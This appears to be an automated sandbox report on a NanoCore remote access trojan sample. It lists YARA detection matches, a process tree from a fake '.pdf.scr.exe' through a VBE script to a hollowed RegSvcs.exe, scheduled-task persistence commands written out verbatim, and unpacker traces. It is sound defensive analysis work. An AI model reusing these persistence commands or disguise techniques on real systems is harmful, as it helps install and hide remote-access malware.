      Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037F122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_0037F122
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: String function: 00330DC0 appears 46 times
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: String function: 0032FD60 appears 40 times
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: String function: 00CDEC50 appears 56 times
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: String function: 00CDEB78 appears 39 times
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: String function: 00CDF5F0 appears 31 times
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CC6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00CC6FAA
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.0000000007390000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameautoruns.exeL, vs 026910003102350.pdf.scr.exe
      Source: 026910003102350.pdf.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9AJump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winEXE@43/44@4/2
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeFile read: C:\Windows\win.iniJump to behavior
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CC6C74 GetLastError,FormatMessageW,0_2_00CC6C74
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00CDA6C2
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
      Source: 026910003102350.pdf.scr.exeReversingLabs: Detection: 46%
      Source: 026910003102350.pdf.scr.exeVirustotal: Detection: 45%
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeFile read: C:\Users\user\Desktop\026910003102350.pdf.scr.exeJump to behavior
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\026910003102350.pdf.scr.exe C:\Users\user\Desktop\026910003102350.pdf.scr.exe
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe" rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp8D34.tmp
      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe"
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbeJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe" rnnsh.xlsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp8D34.tmpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exeJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037194F AdjustTokenPrivileges,CloseHandle,2_2_0037194F
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00371F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_00371F53
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeFile created: C:\Users\user\AppData\Local\temp\Folder8_410Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00394089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,2_2_00394089
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00385B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,2_2_00385B27
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0039AFDB CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,2_2_0039AFDB
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5648:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4124:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1648:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1880:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5092:120:WilError_01
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{d95e5ad5-6193-4689-a919-7befded6bfa5}
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCommand line argument: sfxname0_2_00CDDF1E
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCommand line argument: sfxstime0_2_00CDDF1E
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCommand line argument: STARTDLG0_2_00CDDF1E
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeFile written: C:\Users\user\AppData\Local\Temp\Folder8_410\laaa.iniJump to behavior
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: 026910003102350.pdf.scr.exeStatic file information: File size 1064658 > 1048576
      Source: 026910003102350.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: 026910003102350.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: 026910003102350.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: 026910003102350.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: 026910003102350.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: 026910003102350.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: 026910003102350.pdf.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
      Source: 026910003102350.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 026910003102350.pdf.scr.exe
      Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000003.00000000.380101330.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, RegSvcs.exe.2.dr
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000003.00000000.380101330.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, RegSvcs.exe.2.dr
      Source: 026910003102350.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: 026910003102350.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: 026910003102350.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: 026910003102350.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: 026910003102350.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

      Data Obfuscation

      barindex
      .NET source code contains potential unpacker
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDF640 push ecx; ret 0_2_00CDF653
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDEB78 push eax; ret 0_2_00CDEB96
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00360332 push edi; ret 2_2_00360333
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00330E06 push ecx; ret 2_2_00330E19
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0032DBFA push cs; iretd 2_2_0032DBFD
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0032DC00 push eax; iretd 2_2_0032DC01
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00315D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_00315D78
      Source: 026910003102350.pdf.scr.exeStatic PE information: section name: .didat
      Source: itugx.exe.0.drStatic PE information: real checksum: 0xe50ad should be: 0xe9063
      Source: 026910003102350.pdf.scr.exeStatic PE information: real checksum: 0x0 should be: 0x1079dd
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeFile created: C:\Users\user\AppData\Local\Temp\Folder8_410\__tmp_rar_sfx_access_check_5500781Jump to behavior
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
